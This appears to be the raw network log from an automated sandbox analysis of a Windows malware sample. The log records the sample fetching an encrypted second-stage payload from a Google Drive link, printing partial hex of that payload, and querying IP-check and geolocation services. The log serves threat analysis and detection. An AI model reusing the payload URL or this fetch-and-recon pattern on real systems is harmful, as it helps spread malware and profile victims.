                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449775193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:03:00.082700968 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 28, 2024 02:03:00.922084093 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:03:00 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 0e2c7c078996d536482ad3b87a063640
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449736172.217.18.1104437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:41 UTC216OUTGET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Host: drive.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2024-10-28 01:02:41 UTC1610INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Mon, 28 Oct 2024 01:02:41 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'nonce-chpqaLxB0OaRCv6UBAvE4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449737142.250.185.2254437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:42 UTC258OUTGET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-28 01:02:45 UTC4910INHTTP/1.1 200 OK
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Security-Policy: sandbox
                                                                                            Content-Security-Policy: default-src 'none'
                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                            X-Content-Security-Policy: sandbox
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Content-Disposition: attachment; filename="RJvGhLEx125.bin"
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Credentials: false
                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 275520
                                                                                            Last-Modified: Sun, 27 Oct 2024 21:04:17 GMT
                                                                                            X-GUploader-UploadID: AHmUCY28mKZ0sI9ddNBsTHp43CSQV9A5nJSWT5domAxTpOlsGwRLU1_EsWNrZ23L7nUaTz3lwdY
                                                                                            Date: Mon, 28 Oct 2024 01:02:45 GMT
                                                                                            Expires: Mon, 28 Oct 2024 01:02:45 GMT
                                                                                            Cache-Control: private, max-age=0
                                                                                            X-Goog-Hash: crc32c=CojfBQ==
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-10-28 01:02:45 UTC4910INData Raw: d8 d7 11 22 bc 6a 66 62 06 37 45 40 80 d6 17 2e bd b3 66 d1 7a db 17 8e 81 fe 56 0e f3 11 0b 50 0a cb 56 29 11 dc 42 ba a4 7e 42 b0 8e ab 94 1d 8f 36 b9 a5 07 d2 1c 20 8a 88 e2 3b 0f dd 50 d9 4d 52 c0 63 51 9c 25 22 7b 40 d6 f2 6e a0 b0 12 6e 3a 76 64 88 8c 81 96 bf 58 af ea 01 b4 d9 0c c1 96 09 a5 cf d0 c9 70 3e fc 4e d3 40 39 ea 9b 56 c7 5b 86 91 32 32 28 c8 86 1d 88 5a 55 cc d6 34 97 0d 1d bc 67 cc 26 85 2b 6e 75 fc c2 3d 34 c4 b4 95 b0 90 dc 0c 81 75 ba 6e 19 6a 13 c1 9f 93 4e 30 3c 9e d1 62 5f e8 c7 f6 a0 5a 8c 2f 15 7b dd 0e 08 d8 c3 17 a4 0a 04 38 80 5d 68 e4 7e 40 e5 3d 0a 97 29 00 48 66 fc 52 ac 5c 09 6f d6 d9 5c a9 28 80 a8 a4 19 80 47 a8 d6 29 86 fe d6 0a 55 d9 a5 a6 0c 47 43 10 74 76 79 e9 d9 e7 3d 4a 69 92 44 2c aa e6 4c 70 95 5a 18 b7 c8 52
                                                                                            Data Ascii: "jfb7E@.fzVPV)B~B6 ;PMRcQ%"{@nn:vdXp>N@9V[22(ZU4g&+nu=4unjN0<b_Z/{8]h~@=)HfR\o\(G)UGCtvy=JiD,LpZR
                                                                                            2024-10-28 01:02:45 UTC4876INData Raw: 37 7c b8 6e 67 4c 14 8b 47 63 53 5d 47 11 b7 14 dd ab ac 53 98 f6 00 89 65 a1 53 ad 12 5a 90 49 47 65 80 bb 8e 0e e8 9e dd d7 da 5d 24 c5 df de 42 37 b4 a8 93 e4 9b 18 17 7a 07 88 15 bd 3f 86 14 94 37 09 dd 6a af 14 f5 c5 da 54 8a 29 f8 74 b5 1d 1a cc 56 43 2a 8c bf 1a ad 6c b5 ef e2 2e 7d 30 76 d9 7b c4 fe 7c 44 5b 53 5b 1d 96 46 1e 10 19 d8 45 17 88 f2 21 3f 0f ca 49 e9 54 74 4a b2 2f 29 84 ae 54 6a 12 02 34 a4 5f 6e f3 3a c2 b2 8c 89 e7 c6 0b 10 2b 19 ce eb 83 e1 b0 0b 10 35 55 1b 0e fa 73 0f c1 d6 2b ea 3b bd 6a cd 10 50 e8 36 71 5e ae a8 df 4f a3 ae c4 19 24 8a de 87 bf 01 4b 8b 0c 77 56 f7 59 25 15 fd b5 78 ce 82 4f 7d 81 15 46 73 4d d9 eb 95 7c 33 c3 8f 32 0b 27 3d da 85 e5 af 99 c9 05 0e a0 f1 ea e6 8f 97 17 fd 89 c4 a9 a9 be 6c e8 86 27 0b e5 88
                                                                                            Data Ascii: 7|ngLGcS]GSeSZIGe]$B7z?7jT)tVC*l.}0v{|D[S[FE!?ITtJ/)Tj4_n:+5Us+;jP6q^O$KwVY%xO}FsM|32'=l'
                                                                                            2024-10-28 01:02:45 UTC1325INData Raw: 14 b6 6f f2 f5 2b f3 91 a2 94 85 96 0f 24 f3 6d f9 a2 9c fd d1 e5 2e a1 22 46 d4 6f 08 0a 56 c8 5a ed e2 04 31 26 48 04 40 ac 08 b6 65 f3 e2 ad 21 55 f0 8b 8d 2f 65 30 6f a0 2a ab 7e 45 e0 0d 91 6f ab 57 a3 8e 3b a3 a1 a8 d1 eb 5c 39 80 32 88 0c 84 72 0d e7 ee 96 c2 7e e8 9a 53 33 28 99 bd 7e 80 c0 09 40 4a 09 5f f4 3d fe ed 98 44 fa 23 2b b4 89 d4 c3 15 49 b2 fa 94 c3 cf 06 ef 4b a0 80 08 8d dc 22 f1 eb 8e 76 65 f1 be 8e 88 1f 09 34 e1 01 e2 91 01 4a 1a 9e 49 37 5b c8 16 04 63 8d 70 c5 bf db b3 36 00 4d 02 8b 7f c8 4f ca 0d ed a7 9f 66 48 1e 76 37 3b 49 89 63 cd 68 d9 6e 16 74 f1 13 7c 48 09 d8 54 0a 6d 92 ac 17 ff 6b 66 88 84 d1 41 61 06 5b f2 6e f2 9a a1 b1 64 8e cb b5 19 9d 2d 01 67 1a 5a 33 06 3a 8c 49 55 a5 8b 70 16 fb 0c 48 14 a1 b7 c0 d5 12 a2 9d
                                                                                            Data Ascii: o+$m."FoVZ1&H@e!U/e0o*~EoW;\92r~S3(~@J_=D#+IK"ve4JI7[cp6MOfHv7;Ichnt|HTmkfAa[nd-gZ3:IUpH
                                                                                            2024-10-28 01:02:45 UTC1378INData Raw: 3f 14 68 6c d9 45 21 45 b8 54 8c 89 ed 2a 52 18 01 5f 5a 7a 74 8b 2c a9 b2 fc 21 c2 da 6a 2a a6 46 ca 49 a7 92 a7 8c 1f 3f 25 be 21 e0 15 0f cb b3 70 85 5c b7 79 e6 64 b5 a8 36 7b 53 8b cd c4 ae b1 a4 a7 bf 01 8c f2 3b a8 72 2b 29 29 65 37 a7 56 34 60 2c fb 61 b0 b0 5c 7b 94 b1 61 06 53 e8 e8 9f 0c 4f e5 fa 23 0d 01 26 e9 95 a2 d8 99 c9 05 0e 5c e0 e2 89 e2 bf 60 f7 84 10 a7 a9 d1 56 c4 8e 32 1f ab fb f8 0b 3e e8 bc a5 45 55 a9 a7 9d 09 36 9f 8c 3c 95 59 89 5e bd b0 61 d0 32 97 36 91 01 4c 9e 72 b1 43 dc 70 63 5f 78 bc 89 a5 13 15 e5 71 c4 2f 71 82 87 76 30 01 43 9a 1b a5 ad 52 07 e6 24 a0 d9 aa a0 3f 80 f0 57 9c 1f 86 87 f7 32 1c 45 f4 4b 38 e8 75 50 b1 44 37 fd 94 66 13 4a 6c 19 03 08 d5 d2 05 1e 40 ba 9d 6e f9 23 3a 9a e4 cf dc 4c 81 40 0b 2e 6c 36 db
                                                                                            Data Ascii: ?hlE!ET*R_Zzt,!j*FI?%!p\yd6{S;r+))e7V4`,a\{aSO#&\`V2>EU6<Y^a26LrCpc_xq/qv0CR$?W2EK8uPD7fJl@n#:L@.l6
                                                                                            2024-10-28 01:02:45 UTC1378INData Raw: 0f 26 df ee 17 05 2c 1e 78 2d 64 89 02 0d ec 45 fc 9f 5d aa cb c4 64 3d 1d 21 f0 1a 8e 8e bc 0d 44 52 d4 2f da a8 d8 2c 96 10 07 8f 9b 5c 36 80 50 2f 30 dc bb 12 cb c8 10 9f b8 8a bb 57 61 11 fe 7a d5 51 6e 78 45 91 a0 97 2d 46 d8 d4 38 ec 0e b8 dc 69 20 18 71 d6 1c 23 04 d2 01 1a c8 c0 b6 23 11 56 0d 87 b8 c7 0f d2 52 b3 e5 c1 00 9e 1c 6c 30 9b ac 7f bd ec 9f 24 9a ef ab 3d a7 bc b4 b9 5d 37 f9 67 d1 b2 b3 4d 4c 0d 47 42 4b 5f d1 6c de 42 4c 85 e3 6f 29 d0 90 63 74 04 db d2 43 1d 08 01 7e 95 48 e1 f8 bc bf c0 06 a1 54 ed 8b b8 e0 29 80 73 ea 56 9a 45 33 24 9f 36 18 be c2 80 e2 e9 4d 3f eb 6a 09 dc b0 19 d3 0c 57 c9 e4 36 41 e2 5a 19 b9 e3 4f fc 03 a6 d9 e3 fc 67 30 4a ea 70 cf d1 b1 82 03 0e 64 4e 1d 74 64 ee 01 73 f5 5f a1 37 b8 6d de f1 11 c2 76 58 a0
                                                                                            Data Ascii: &,x-dE]d=!DR/,\6P/0WazQnxE-F8i q##VRl0$=]7gMLGBK_lBLo)ctC~HT)sVE3$6M?jW6AZOg0JpdNtds_7mvX
                                                                                            2024-10-28 01:02:45 UTC1378INData Raw: 6f 28 74 79 d9 5a 97 8c 65 21 22 57 fc 68 2d 02 c4 35 e4 1c dc 24 7a 60 8c b4 15 72 ce 6c aa 38 6c da 7f e0 0d e9 2f 6b 57 a7 f6 86 60 a1 d8 cd c3 ae fb 80 38 94 e1 8d 68 02 a0 f0 97 c2 7a 8f 89 06 33 22 f7 51 53 80 ca 03 23 5b 76 9a 84 2a 79 90 a5 44 fb 02 52 0c cd d4 c9 11 70 be 88 13 d5 a0 cf c7 ff aa f2 17 ea 41 42 d9 c0 a6 2d 6f 8f ff e1 4f 1b 21 74 e1 10 e0 f2 93 0a 1a 9a 60 58 4d ba 27 a9 77 e9 c6 c8 12 f3 07 3c 74 c4 a0 ae 66 b6 1a cd 7f ca 15 ba 0f 59 9d 76 37 35 eb a4 07 fd 11 d6 6a 18 95 d4 08 06 11 b5 d8 50 a2 27 33 de 90 fa 6b 3e 70 ac a4 4b 7c 81 74 3a 6e f3 b5 b7 bd 51 9b cb c1 c8 71 3a 29 d9 09 53 47 95 1f 94 3f 72 3f 89 00 c4 c8 3d b7 2c a1 bd d2 89 36 ab e5 04 5a 2c 87 67 5a a0 91 7a 0b 90 28 8b 1b 37 f3 35 f8 4d 2f cc e2 56 80 db 01 39
                                                                                            Data Ascii: o(tyZe!"Wh-5$z`rl8l/kW`8hz3"QS#[v*yDRpAB-oO!t`XM'w<tfYv75jP'3k>pK|t:nQq:)SG?r?=,6Z,gZz(75M/V9
                                                                                            2024-10-28 01:02:45 UTC1378INData Raw: f2 53 27 0a 9f c4 0b 67 88 5c 71 83 0f 55 00 4e a2 eb 9f 76 fe d0 9e 3f 62 a0 35 cb 89 8a bf 83 a6 a5 0e 7c ea ee 98 f9 f8 cc f7 84 10 a7 a9 97 aa c4 8e 36 0e 8a 9f df 6e 3e 98 c8 ba 65 55 a1 8f d4 21 41 95 9d 14 eb 05 04 1e b9 98 5e f5 24 e3 a2 44 11 19 9e 07 b1 43 d0 c1 65 48 2e 9b 89 a5 1d 69 c0 69 b6 f6 1e b5 f7 5e 74 73 d6 9e b9 f0 a2 04 c0 e6 24 ae 6d 71 bb 5e a1 f3 73 c0 e1 be 11 ac bf 5c 44 d1 5c 6f c5 08 d7 d1 e6 62 48 99 c5 3b fe 66 bb 2c b2 82 9f 78 61 25 18 c8 d5 a2 02 12 2e e0 6d f3 f4 d6 23 76 4f 0e 94 8e 5f a1 f9 e5 4b 98 d6 47 04 65 45 ea 31 9a df 97 f1 44 0e 1d c5 b8 37 99 4a f6 b4 0b e3 87 b5 13 f0 e9 b8 33 c8 e5 72 76 e6 5d 2c 11 52 6b 5e 6e d7 8f 09 eb b0 c8 1a 31 dd 9a 61 55 ff a6 f9 e8 f1 85 6b a9 27 30 99 cd 0e 83 ce 0e e0 7d 95 ba
                                                                                            Data Ascii: S'g\qUNv?b5|6n>eU!A^$DCeH.ii^ts$mq^s\D\obH;f,xa%.m#vO_KGeE1D7J3rv],Rk^n1aUk'0}
                                                                                            2024-10-28 01:02:45 UTC1378INData Raw: 1f b0 c1 06 ea 1f 1e 63 1c 23 25 d4 08 03 d6 de 57 80 7e 08 07 87 b2 d6 0e c3 c6 b3 e5 cf 28 8b 10 6c 33 d8 67 76 d2 e7 9f 35 98 91 4d e3 b4 9d e2 b6 5d 37 f7 07 69 b2 9b 25 23 c0 4d 9f 22 59 c0 64 cf 44 23 35 d1 6f 23 d4 f3 f0 19 cb ab c4 61 9c 20 65 74 83 b0 e0 35 a9 8b ed 0b 6b 56 e7 98 cc cf 01 e2 77 98 3d 54 45 43 32 b7 c9 2d be c8 92 6e 7d 5c 39 8a 7a 18 6d b1 19 d9 1a bd 36 f1 00 50 e9 65 a1 78 e3 4f 88 00 67 d9 e7 de 8c 43 88 e0 63 c9 bc 80 93 04 74 2c 51 0c 70 67 3b 29 f2 ff 30 6f 21 46 66 cd ed 07 a0 8a 81 a0 0d 7c d2 a5 52 8d c1 4e ed 68 08 fd 71 a7 de 2d 6c a9 a1 ab a4 80 38 1a 89 7d 18 17 a1 4f 6b 71 51 2d c0 4b 68 4e a5 12 6c c8 ab 5e e6 cb b7 78 91 09 d3 3b 81 03 7f a9 c4 e1 63 cf 91 5c 77 e8 ad 64 0a cb da 3f cd d9 a0 4c b5 30 b6 45 8b 36
                                                                                            Data Ascii: c#%W~(l3gv5M]7i%#M"YdD#5o#a et5kVw=TEC2-n}\9zm6PexOgCct,Qpg;)0o!Ff|RNhq-l8}OkqQ-KhNl^x;c\wd?L0E6
                                                                                            2024-10-28 01:02:45 UTC1378INData Raw: f4 93 af 59 77 67 44 72 88 f1 df 67 71 ac 88 63 71 ea 61 ef 4b a0 80 08 5d 64 2a 83 ce a9 2d 15 53 91 f8 31 27 09 3e e5 b2 cf 96 fe 3b 19 9e 38 b0 68 a1 53 2b 63 fd d6 42 8d ef 75 03 16 47 d0 0c 4f cf 1a c5 07 f2 59 ba 7f 3c 35 54 2c b2 ab ac 79 be 34 c0 1c 21 c1 d4 78 a0 47 1e f0 e4 a8 48 84 7c b5 e8 19 43 25 ac d4 e3 44 15 4a 02 6e f2 94 03 ea 42 fc fa b2 6a 24 8f 29 18 09 53 47 24 19 9a 65 51 30 89 7a 66 cd 24 c5 14 a1 95 a1 2b 13 bb 97 7d 2b 13 f7 c5 7b aa cd 14 6c 87 2c 94 8b 28 f3 3f 5e 40 7a be d7 48 91 88 dd 51 7f 35 37 a6 ef 02 51 98 d7 58 01 55 17 91 f3 23 31 c2 0e dc 0e d3 b6 df 60 42 73 d0 06 38 ef 4c f7 a5 6f 3b e5 31 e1 09 c4 0d db 02 b1 18 f7 09 7f 3c b0 fd 2a 61 3b 7c 6d 42 75 aa b6 9e 59 54 66 71 67 41 3e b2 20 74 15 3f 3c 53 ce a4 3b 17
                                                                                            Data Ascii: YwgDrgqcqaK]d*-S1'>;8hS+cBuGOY<5T,y4!xGH|C%DJnBj$)SG$eQ0zf$+}+{l,(?^@zHQ57QXU#1`Bs8Lo;1<*a;|mBuYTfqgA> t?<S;
                                                                                            2024-10-28 01:02:45 UTC1378INData Raw: 91 46 31 0e 69 b6 42 99 0a d6 63 4a 2d 59 cf 89 d5 6a 19 e5 71 ce 40 dc b5 87 7c 34 0d ea 98 1b d1 c8 b3 86 e6 2e b9 de 2a 90 2c a4 e5 01 25 41 9b 7a a1 1a 9d 44 d1 57 5c 2d 7b 43 d3 f7 00 c6 b0 c3 02 5d 09 71 26 10 ad 87 0a 35 3b 18 a9 66 91 74 f0 9a e0 67 f9 56 e2 28 7a 10 1c 94 fa d5 42 8c e5 41 fd b8 6f 71 6f 45 f1 33 fa 97 50 e4 40 00 58 da b8 33 ee de bf b4 01 86 38 00 01 fa 99 81 60 d9 e9 1b a9 f8 4c 32 39 07 67 31 a7 d7 52 82 ea 6e d8 1a 31 dd 9a 61 55 ff aa f9 e8 f1 85 6b a9 27 30 99 cd 0e 83 b0 44 d5 7d 91 cc 14 f6 51 42 14 23 62 24 ea 8b be 4a 75 4b 18 59 92 b4 66 a7 04 b4 59 42 8f ea 7c e8 25 eb 90 e1 a0 98 20 e7 bf 36 23 e5 ca dc 97 ca 30 bc 82 81 d9 5a 6f 65 62 a1 65 67 20 30 f9 83 93 4e 5b 40 c1 bc 6a ce a4 3d 49 63 4a 2f 11 d4 5f e9 a9 bb
                                                                                            Data Ascii: F1iBcJ-Yjq@|4.*,%AzDW\-{C]q&5;ftgV(zBAoqoE3P@X38`L29g1Rn1aUk'0D}QB#b$JuKYfYB|% 6#0Zoebeg 0N[@j=IcJ/_


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449739188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:48 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-28 01:02:49 UTC873INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: MISS
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lwmEH6Yq4UK0W%2FCVXSv0e9N5xrjXMD4pDZvFqVFAhymrFca%2F6hpBnzaxeaAMj1k9gWl8SK3zwYsA7qvwiHJyAb1uMN883QuZIgQb8PQJslMozL23Q%2FLZf%2Fht3V6DCpuc9KQbkY8k"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700a3ab700b95-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2157973&cwnd=249&unsent_bytes=0&cid=7fe2383ffa841996&ts=389&x=0"
                                                                                            2024-10-28 01:02:49 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449740188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:50 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            2024-10-28 01:02:50 UTC878INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:50 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 1
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCQtTn390h7jq75EK7koaJ0PFrPm0ztrx1Ynx1Zg7uO5RddbytRwQcstGjNJjzxpbt0h4RVhdDcOdsr9rrzCRtVdKZ573w%2BAeFYqmCSqYa9ygcEQdQd%2F9c5LqYVHIQAmD0yVp%2B9D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700ab7b426b23-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2385502&cwnd=251&unsent_bytes=0&cid=fdedf2974bc030e6&ts=155&x=0"
                                                                                            2024-10-28 01:02:50 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449742188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
